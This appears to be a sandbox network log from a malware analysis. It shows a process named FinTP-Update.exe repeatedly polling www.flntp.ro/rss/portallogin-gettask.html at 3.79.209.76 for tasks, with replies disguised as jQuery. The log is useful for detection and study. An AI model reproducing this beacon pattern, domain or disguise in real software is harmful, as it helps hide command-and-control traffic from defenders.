                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:46 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:46 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5628
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:46 UTC | 5628 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            15 | 192.168.2.5 | 49780 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:12:47 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:48 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:48 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5628
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:48 UTC | 5628 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            16 | 192.168.2.5 | 49786 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:12:50 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:50 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:50 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:50 UTC | 5692 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49792 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:12:52 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:12:53 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:53 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:12:53 UTC | 5692 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49798 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:12:54 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:12:55 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:55 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:12:55 UTC | 5692 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49804 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:12:57 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:12:57 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:57 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:12:57 UTC | 5692 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49810 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:12:59 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:12:59 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:59 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5649
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:12:59 UTC | 5649 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49816 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:13:01 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:13:02 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:02 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:13:02 UTC | 5607 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49822 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:13:04 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:13:04 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:04 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5713
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:13:04 UTC | 5713 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49829 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:13:06 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
2024-12-19 22:13:07 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:06 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5628
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
2024-12-19 22:13:07 UTC | 5628 | IN
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49835 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:13:08 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Host: www.flntp.ro
    Accept-Encoding: gzip, deflate
    Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-19 22:13:09 UTC | 235 | IN | HTTP/1.1 200 OK
    Server: nginx/1.24.0 (Ubuntu)
    Date: Thu, 19 Dec 2024 22:13:09 GMT
    Content-Type: application/javascript; charset=utf-8
    Content-Length: 5649
    Connection: close
    Cache-Control: max-age=0, no-cache
    Pragma: no-cache
2024-12-19 22:13:09 UTC | 5649 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49843 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:13:10 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Host: www.flntp.ro
    Accept-Encoding: gzip, deflate
    Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-19 22:13:11 UTC | 235 | IN | HTTP/1.1 200 OK
    Server: nginx/1.24.0 (Ubuntu)
    Date: Thu, 19 Dec 2024 22:13:11 GMT
    Content-Type: application/javascript; charset=utf-8
    Content-Length: 5628
    Connection: close
    Cache-Control: max-age=0, no-cache
    Pragma: no-cache
2024-12-19 22:13:11 UTC | 5628 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49850 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:13:13 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Host: www.flntp.ro
    Accept-Encoding: gzip, deflate
    Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-19 22:13:13 UTC | 235 | IN | HTTP/1.1 200 OK
    Server: nginx/1.24.0 (Ubuntu)
    Date: Thu, 19 Dec 2024 22:13:13 GMT
    Content-Type: application/javascript; charset=utf-8
    Content-Length: 5628
    Connection: close
    Cache-Control: max-age=0, no-cache
    Pragma: no-cache
2024-12-19 22:13:13 UTC | 5628 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 49856 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:13:15 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Host: www.flntp.ro
    Accept-Encoding: gzip, deflate
    Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-19 22:13:16 UTC | 235 | IN | HTTP/1.1 200 OK
    Server: nginx/1.24.0 (Ubuntu)
    Date: Thu, 19 Dec 2024 22:13:15 GMT
    Content-Type: application/javascript; charset=utf-8
    Content-Length: 5628
    Connection: close
    Cache-Control: max-age=0, no-cache
    Pragma: no-cache
2024-12-19 22:13:16 UTC | 5628 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 49862 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:13:17 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Host: www.flntp.ro
    Accept-Encoding: gzip, deflate
    Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-19 22:13:18 UTC | 235 | IN | HTTP/1.1 200 OK
    Server: nginx/1.24.0 (Ubuntu)
    Date: Thu, 19 Dec 2024 22:13:18 GMT
    Content-Type: application/javascript; charset=utf-8
    Content-Length: 5649
    Connection: close
    Cache-Control: max-age=0, no-cache
    Pragma: no-cache
2024-12-19 22:13:18 UTC | 5649 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 49868 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:13:19 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Host: www.flntp.ro
    Accept-Encoding: gzip, deflate
    Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-19 22:13:20 UTC | 235 | IN | HTTP/1.1 200 OK
    Server: nginx/1.24.0 (Ubuntu)
    Date: Thu, 19 Dec 2024 22:13:20 GMT
    Content-Type: application/javascript; charset=utf-8
    Content-Length: 5713
    Connection: close
    Cache-Control: max-age=0, no-cache
    Pragma: no-cache
2024-12-19 22:13:20 UTC | 5713 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 49874 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 22:13:21 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Host: www.flntp.ro
    Accept-Encoding: gzip, deflate
    Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-19 22:13:22 UTC | 235 | IN | HTTP/1.1 200 OK
    Server: nginx/1.24.0 (Ubuntu)
    Date: Thu, 19 Dec 2024 22:13:22 GMT
    Content-Type: application/javascript; charset=utf-8
    Content-Length: 5607
    Connection: close
    Cache-Control: max-age=0, no-cache
    Pragma: no-cache
2024-12-19 22:13:22 UTC | 5607 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            31 | 192.168.2.5 | 49880 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:24 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:24 UTC | 235 | IN | HTTP/1.1 200 OK
